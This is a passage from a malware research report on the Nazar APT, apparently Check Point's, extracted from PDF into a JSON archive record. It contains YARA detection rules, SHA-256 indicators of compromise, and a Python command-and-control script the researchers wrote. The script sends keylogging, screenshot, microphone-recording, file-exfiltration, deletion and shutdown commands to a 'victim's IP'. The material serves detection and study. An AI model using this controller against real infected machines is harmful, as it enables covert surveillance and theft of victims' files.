28\n\n\"460eba344823766fe7c8f13b647b4d5d979ce4041dd5cb4a6d538783d96b2ef8\" hash =\r\n\"4d0ab3951df93589a874192569cac88f7107f595600e274f52e2b75f68593bca\" hash =\r\n\"75e4d73252c753cd8e177820eb261cd72fecd7360cc8ec3feeab7bd129c01ff6\" hash =\r\n\"8fb9a22b20a338d90c7ceb9424d079a61ca7ccb7f78ffb7d74d2f403ae9fbeec\" hash =\r\n\"967ac245e8429e3b725463a5c4c42fbdf98385ee6f25254e48b9492df21f2d0b\" hash =\r\n\"be624acab7dfe6282bbb32b41b10a98b6189ab3a8d9520e7447214a7e5c27728\" hash =\r\n\"d34a996826ea5a028f5b4713c797247913f036ca0063cc4c18d8b04736fa0b65\" hash =\r\n\"d9801b4da1dbc5264e83029abb93e800d3c9971c650ecc2df5f85bcc10c7bd61\" hash =\r\n\"eb705459c2b37fba5747c73ce4870497aa1d4de22c97aaea4af38cdc899b51d3\" strings: $guid1_godown = { 98 B3\r\nE5 F6 DF E3 6B 49 A2 AD C2 0F EA 30 DB FE } // Godown.dll IID $guid2_godown = { 31 4B CB DB B8 21 0F\r\n4A BC 69 0C 3C E3 B6 6D 00 } // Godown.dll CLSID $guid3_godown = { AF 94 4E B6 6B D5 B4 48 B1 78 AF\r\n07 23 E7 2A B5 } // probably Godown $guid4_filesystem = { 79 27 AB 37 34 F2 9D 4D B3 FB 59 A3 FA CB 8D\r\n60 } // Filesystem.dll CLSID $guid6_filesystem = { 2D A1 2B 77 62 8A D3 4D B3 E8 92 DA 70 2E 6F 3D } //\r\nFilesystem.dll TypeLib IID $guid5_filesystem = { AB D3 13 CF 1C 6A E8 4A A3 74 DE D5 15 5D 6A 88 } //\r\nFilesystem.dll condition: any of them }\r\nrule apt_nazar_svchost_commands\r\n{\r\n meta:\r\n description = \"Detect Nazar's svchost based on supported commands\"\r\n author = \"Itay Cohen\"\r\n date = \"2020-04-26\"\r\n reference = \"\u003chttps://www.epicturla.com/blog/the-lost-nazar\u003e\"\r\n hash = \"2fe9b76496a9480273357b6d35c012809bfa3ae8976813a7f5f4959402e3fbb6\"\r\n hash = \"be624acab7dfe6282bbb32b41b10a98b6189ab3a8d9520e7447214a7e5c27728\"\r\n strings:\r\n $str1 = { 33 31 34 00 36 36 36 00 33 31 33 00 }\r\n $str2 = { 33 31 32 00 33 31 35 00 35 35 35 00 }\r\n $str3 = { 39 39 39 00 35 39 39 00 34 39 39 00 }\r\n $str4 = { 32 30 39 00 32 30 31 00 32 30 30 00 }\r\n $str5 = { 31 39 39 00 31 31 39 00 31 38 39 00 31 33 39 00 33 31 31 00 }\r\n condition:\r\n 4 of them\r\n}\r\nrule apt_nazar_component_guids\r\n{\r\n meta:\r\n description = \"Detect Nazar Components by COM Objects' GUID\"\r\n author = \"Itay Cohen\"\r\n date = \"2020-04-27\"\r\n reference = \"\u003chttps://www.epicturla.com/blog/the-lost-nazar\u003e\"\r\n hash = \"1110c3e34b6bbaadc5082fabbdd69f492f3b1480724b879a3df0035ff487fd6f\"\r\n hash = \"1afe00b54856628d760b711534779da16c69f542ddc1bb835816aa92ed556390\"\r\nhttps://research.checkpoint.com/2020/nazar-spirits-of-the-past/\r\nPage 20 of 28\n\nhash = \"2caedd0b2ea45761332a530327f74ca5b1a71301270d1e2e670b7fa34b6f338e\"\r\n hash = \"2fe9b76496a9480273357b6d35c012809bfa3ae8976813a7f5f4959402e3fbb6\"\r\n hash = \"460eba344823766fe7c8f13b647b4d5d979ce4041dd5cb4a6d538783d96b2ef8\"\r\n hash = \"4d0ab3951df93589a874192569cac88f7107f595600e274f52e2b75f68593bca\"\r\n hash = \"75e4d73252c753cd8e177820eb261cd72fecd7360cc8ec3feeab7bd129c01ff6\"\r\n hash = \"8fb9a22b20a338d90c7ceb9424d079a61ca7ccb7f78ffb7d74d2f403ae9fbeec\"\r\n hash = \"967ac245e8429e3b725463a5c4c42fbdf98385ee6f25254e48b9492df21f2d0b\"\r\n hash = \"be624acab7dfe6282bbb32b41b10a98b6189ab3a8d9520e7447214a7e5c27728\"\r\n hash = \"d34a996826ea5a028f5b4713c797247913f036ca0063cc4c18d8b04736fa0b65\"\r\n hash = \"d9801b4da1dbc5264e83029abb93e800d3c9971c650ecc2df5f85bcc10c7bd61\"\r\n hash = \"eb705459c2b37fba5747c73ce4870497aa1d4de22c97aaea4af38cdc899b51d3\"\r\n strings:\r\n $guid1_godown = { 98 B3 E5 F6 DF E3 6B 49 A2 AD C2 0F EA 30 DB FE } // Godown.dll IID\r\n $guid2_godown = { 31 4B CB DB B8 21 0F 4A BC 69 0C 3C E3 B6 6D 00 } // Godown.dll CLSID\r\n $guid3_godown = { AF 94 4E B6 6B D5 B4 48 B1 78 AF 07 23 E7 2A B5 } // probably Godown\r\n $guid4_filesystem = { 79 27 AB 37 34 F2 9D 4D B3 FB 59 A3 FA CB 8D 60 } // Filesystem.dll CLS\r\n $guid6_filesystem = { 2D A1 2B 77 62 8A D3 4D B3 E8 92 DA 70 2E 6F 3D } // Filesystem.dll Typ\r\n $guid5_filesystem = { AB D3 13 CF 1C 6A E8 4A A3 74 DE D5 15 5D 6A 88 } // Filesystem.dll\r\n \r\n condition:\r\n any of them\r\n}\r\nAppendix B: Indication of Compromises\r\nFile Sha-256\r\ngpUpdates.exe\r\n4d0ab3951df93589a874192569cac88f7107f595600e274f52e2b75f68593bca\r\nd34a996826ea5a028f5b4713c797247913f036ca0063cc4c18d8b04736fa0b65\r\neb705459c2b37fba5747c73ce4870497aa1d4de22c97aaea4af38cdc899b51d3\r\nData.bin\r\nd9801b4da1dbc5264e83029abb93e800d3c9971c650ecc2df5f85bcc10c7bd61\r\n75e4d73252c753cd8e177820eb261cd72fecd7360cc8ec3feeab7bd129c01ff6\r\n2caedd0b2ea45761332a530327f74ca5b1a71301270d1e2e670b7fa34b6f338e\r\nDistribute.exe\r\n839c3e6ba65e5d07a2e0c4dd4a2c0d7ae95a266431dd3f8971b8a37d17b1ddf6\r\n6b8ea9a156d495ec089710710ce3f4b1e19251c1d0e5b2c21bbeeab05e7b331f\r\nFilesystem.dll\r\n1afe00b54856628d760b711534779da16c69f542ddc1bb835816aa92ed556390\r\n460eba344823766fe7c8f13b647b4d5d979ce4041dd5cb4a6d538783d96b2ef8\r\n1110c3e34b6bbaadc5082fabbdd69f492f3b1480724b879a3df0035ff487fd6f\r\nhttps://research.checkpoint.com/2020/nazar-spirits-of-the-past/\r\nPage 21 of 28\n\nFile Sha-256\r\nHodll.dll 0c09fedc5c74f90883cd3256a181d03e4376d13676c1fe266dbd04778a929198\r\nGodown.dll\r\n967ac245e8429e3b725463a5c4c42fbdf98385ee6f25254e48b9492df21f2d0b\r\n8fb9a22b20a338d90c7ceb9424d079a61ca7ccb7f78ffb7d74d2f403ae9fbeec\r\nsvchost.exe\r\n2fe9b76496a9480273357b6d35c012809bfa3ae8976813a7f5f4959402e3fbb6\r\nbe624acab7dfe6282bbb32b41b10a98b6189ab3a8d9520e7447214a7e5c27728\r\nViewScreen.dll\r\n(benign)\r\n5a924dec60c623cf73f5b8505e11512ad85e62ac571a840ab0ff48d4a04b60de\r\npssdk41.sys\r\n(benign)\r\n048208864c793a670159723b38c3ea1474ccc62e06b90833bdf1683b8026e12f\r\nlame_enc.dll\r\n(benign)\r\nc84100d52c09703e32951444bd7ba4e22c5d41193e7420aacbbc1f736f4c4e1f\r\n0091e2101f00751c4020ef8e115cfe12a284c9abacc886f549b40a62574a7510\r\nAppendix C: Python Server\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\nfrom scapy.all import *\r\nimport struct\r\nimport socket\r\nimport hexdump\r\nimport argparse\r\nDST_PORT = 1234\r\n# 4000 is the usual port without sending files, but we use it for everything, because why not?\r\nSERVER_PORT = 4000\r\n# We want to make sure the ID has the little endian of it\r\nID = struct.unpack('\u003eH',struct.pack('\u003cH',4000))[0]\r\ndef get_response(sock, should_loop):\r\nhttps://research.checkpoint.com/2020/nazar-spirits-of-the-past/\r\nPage 22 of 28\n\nstarted = False\r\ntotal_payload = b''\r\nwhile(should_loop or not started):\r\ntry:\r\npayload, client_address = sock.recvfrom(4096)\r\nexcept ConnectionResetError:\r\npayload, client_address = sock.recvfrom(4096)\r\ntotal_payload += payload\r\n# Good enough stop condition\r\nif (len(payload) \u003e= 4\r\nand payload[:3] == b'---'\r\nand payload[4] \u003e= ord('0')\r\nand payload[4] \u003c= ord('9')):\r\nshould_loop = False\r\nstarted = True\r\nhexdump.hexdump(total_payload)\r\nMENU = \"\"\"Welcome to NAZAR. Please choose:\r\n999 - Get a ping from the victim.\r\n555 - Get information on the victim's machine.\r\n311 - Start keylogging (312 to disable).\r\n139 - Shutdown victim's machine.\r\n189 - Screenshot (313 to disable).\r\n119 - Record audio from Microphone (315 to disable).\r\n199 - List drives.\r\n200 - List recursivley from directory*.\r\n201 - Send a file*.\r\nhttps://research.checkpoint.com/2020/nazar-spirits-of-the-past/\r\nPage 23 of 28\n\n209 - Remove file*.\r\n599 - List devices.\r\n* (append a path, use double-backslashes)\r\nquit to Quit,\r\nhelp for this menu.\r\n\"\"\"\r\ndef get_message():\r\nwhile True:\r\ncurr_message = input('\u003e ').strip()\r\nif 'quit' in curr_message:\r\nreturn None\r\nif 'help' in curr_message:\r\nprint(MENU)\r\nelse:\r\nreturn curr_message\r\ndef get_sock():\r\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\nserver_address = '0.0.0.0'\r\nserver = (server_address, SERVER_PORT)\r\nsock.bind(server)\r\nreturn sock\r\ndef main(ip_addr):\r\nsock = get_sock()\r\nprint(MENU)\r\nmulti_packets = [\"200\",\"201\", \"119\", \"189\", \"311\", \"199\", \"599\"]\r\nsingle_packets = [\"999\", \"555\"]\r\nhttps://research.checkpoint.com/2020/nazar-spirits-of-the-past/\r\nPage 24 of 28\n\nall_commands = single_packets + multi_packets\r\nwhile True:\r\ncurr_message = get_message()\r\nif not curr_message:\r\nbreak\r\n# Send message using scapy\r\n# Make sure the IP identification field is little endian of the port.\r\nsr1(\r\nIP(dst=ip_addr, id=ID)/\r\nUDP(sport=SERVER_PORT,dport=1234)/\r\nRaw(load=curr_message),\r\nverbose=0\r\n)\r\ncommand = curr_message[:3]\r\nif command not in all_commands:\r\ncontinue\r\nshould_loop = command in multi_packets\r\nget_response(sock, should_loop)\r\nif __name__ == '__main__':\r\nparser = argparse.ArgumentParser(description=\"victim's IP\")\r\nparser.add_argument('ip')\r\nargs = parser.parse_args()\r\nmain(args.ip)\r\nfrom scapy.all import * import struct import socket import hexdump import argparse DST_PORT = 1234 # 4000\r\nis the usual port without sending files, but we use it for everything, because why not? SERVER_PORT = 4000 #\r\nWe want to make sure the ID has the little endian of it ID = struct.unpack('\u003eH',struct.pack('\u003cH',4000))[0] def\r\nget_response(sock, should_loop): started = False total_payload = b'' while(should_loop or not started): try:\r\npayload, client_address = sock.recvfrom(4096) except ConnectionResetError: payload, client_address =\r\nhttps://research.checkpoint.com/2020/nazar-spirits-of-the-past/\r\nPage 25 of 28\n\nsock.recvfrom(4096) total_payload += payload # Good enough stop condition if (len(payload) \u003e= 4 and\r\npayload[:3] == b'---' and payload[4] \u003e= ord('0') and payload[4] \u003c= ord('9')): should_loop = False started = True\r\nhexdump.hexdump(total_payload) MENU = \"\"\"Welcome to NAZAR. Please choose: 999 - Get a ping from the\r\nvictim. 555 - Get information on the victim's machine. 311 - Start keylogging (312 to disable). 139 - Shutdown\r\nvictim's machine. 189 - Screenshot (313 to disable). 119 - Record audio from Microphone (315 to disable). 199 -\r\nList drives. 200 - List recursivley from directory*. 201 - Send a file*. 209 - Remove file*. 599 - List devices. *\r\n(append a path, use double-backslashes) quit to Quit, help for this menu. \"\"\" def get_message(): while True:\r\ncurr_message = input('\u003e ').strip() if 'quit' in curr_message: return None if 'help' in curr_message: print(MENU)\r\nelse: return curr_message def get_sock(): sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\nserver_address = '0.0.0.0' server = (server_address, SERVER_PORT) sock.bind(server) return sock def\r\nmain(ip_addr): sock = get_sock() print(MENU) multi_packets = [\"200\",\"201\", \"119\", \"189\", \"311\", \"199\", \"599\"]\r\nsingle_packets = [\"999\", \"555\"] all_commands = single_packets + multi_packets while True: curr_message =\r\nget_message() if not curr_message: break # Send message using scapy # Make sure the IP identification field is\r\nlittle endian of the port. sr1( IP(dst=ip_addr, id=ID)/ UDP(sport=SERVER_PORT,dport=1234)/\r\nRaw(load=curr_message), verbose=0 ) command = curr_message[:3] if command not in all_commands: continue\r\nshould_loop = command in multi_packets get_response(sock, should_loop) if __name__ == '__main__': parser =\r\nargparse.ArgumentParser(description=\"victim's IP\") parser.add_argument('ip') args = parser.parse_args()\r\nmain(args.ip)\r\nfrom scapy.all import *\r\nimport struct\r\nimport socket\r\nimport hexdump\r\nimport argparse\r\nDST_PORT = 1234\r\n# 4000 is the usual port without sending files, but we use it for everything, because why not?\r\nSERVER_PORT = 4000\r\n# We want to make sure the ID has the little endian of it\r\nID = struct.unpack('\u003eH',struct.pack('\u003cH',4000))[0]\r\ndef get_response(sock, should_loop):\r\n started = False\r\n total_payload = b''\r\n while(should_loop or not started):\r\n try:\r\n payload, client_address = sock.recvfrom(4096)\r\n except ConnectionResetError:\r\n payload, client_address = sock.recvfrom(4096)\r\n \r\n total_payload += payload\r\n # Good enough stop condition\r\n if (len(payload) \u003e= 4\r\nhttps://research.checkpoint.com/2020/nazar-spirits-of-the-past/\r\nPage 26 of 28\n\nand payload[:3] == b'---'\r\n and payload[4] \u003e= ord('0')\r\n and payload[4] \u003c= ord('9')):\r\n should_loop = False\r\n started = True\r\n hexdump.hexdump(total_payload)\r\nMENU = \"\"\"Welcome to NAZAR. Please choose:\r\n 999 - Get a ping from the victim.\r\n 555 - Get information on the victim's machine.\r\n 311 - Start keylogging (312 to disable).\r\n 139 - Shutdown victim's machine.\r\n 189 - Screenshot (313 to disable).\r\n 119 - Record audio from Microphone (315 to disable).\r\n 199 - List drives.\r\n 200 - List recursivley from directory*.\r\n 201 - Send a file*.\r\n 209 - Remove file*.\r\n 599 - List devices.\r\n* (append a path, use double-backslashes)\r\nquit to Quit,\r\nhelp for this menu.\r\n \"\"\"\r\ndef get_message():\r\n while True:\r\n curr_message = input('\u003e ').strip()\r\n if 'quit' in curr_message:\r\n return None\r\n if 'help' in curr_message:\r\n print(MENU)\r\n else:\r\n return curr_message\r\ndef get_sock():\r\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n server_address = '0.0.0.0'\r\n server = (server_address, SERVER_PORT)\r\n sock.bind(server)\r\n return sock\r\ndef main(ip_addr):\r\n sock = get_sock()\r\n \r\n print(MENU)\r\nhttps://research.checkpoint.com/2020/nazar-spirits-of-the-past/\r\nPage 27 of 28\n\nmulti_packets = [\"200\",\"201\", \"119\", \"189\", \"311\", \"199\", \"599\"]\r\n single_packets = [\"999\", \"555\"]\r\n all_commands = single_packets + multi_packets\r\n while True:\r\n \r\n curr_message = get_message()\r\n if not curr_message:\r\n break\r\n \r\n # Send message using scapy\r\n # Make sure the IP identification field is little endian of the port.\r\n sr1(\r\n IP(dst=ip_addr, id=ID)/\r\n UDP(sport=SERVER_PORT,dport=1234)/\r\n Raw(load=curr_message),\r\n verbose=0\r\n )\r\n command = curr_message[:3]\r\n if command not in all_commands:\r\n continue\r\n should_loop = command in multi_packets\r\n get_response(sock, should_loop)\r\nif __name__ == '__main__':\r\n parser = argparse.ArgumentParser(description=\"victim's IP\")\r\n parser.add_argument('ip')\r\n args = parser.parse_args()\r\n main(args.ip)\r\nSource: https://research.checkpoint.com/2020/nazar-spirits-of-the-past/\r\nhttps://research.checkpoint.com/2020/nazar-spirits-of-the-past/\r\nPage 28 of 28\n\nsock = get_sock() print(MENU)   \nmulti_packets = [\"200\",\"201\", \"119\", \"189\", \"311\", \"199\", \"599\"]\nsingle_packets = [\"999\", \"555\"]  \n   Page 24 of 28",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://research.checkpoint.com/2020/nazar-spirits-of-the-past/"
	],
	"report_names": [
		"nazar-spirits-of-the-past"
	],
	"threat_actors": [],
	"ts_created_at": 1775874199,
	"ts_updated_at": 1775874255,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/86864f605f7035b4d98342f0087a70ea42f42a7f.pdf",
		"text": "https://archive.orkl.eu/86864f605f7035b4d98342f0087a70ea42f42a7f.txt",
		"img": "https://archive.orkl.eu/86864f605f7035b4d98342f0087a70ea42f42a7f.jpg"
	}
}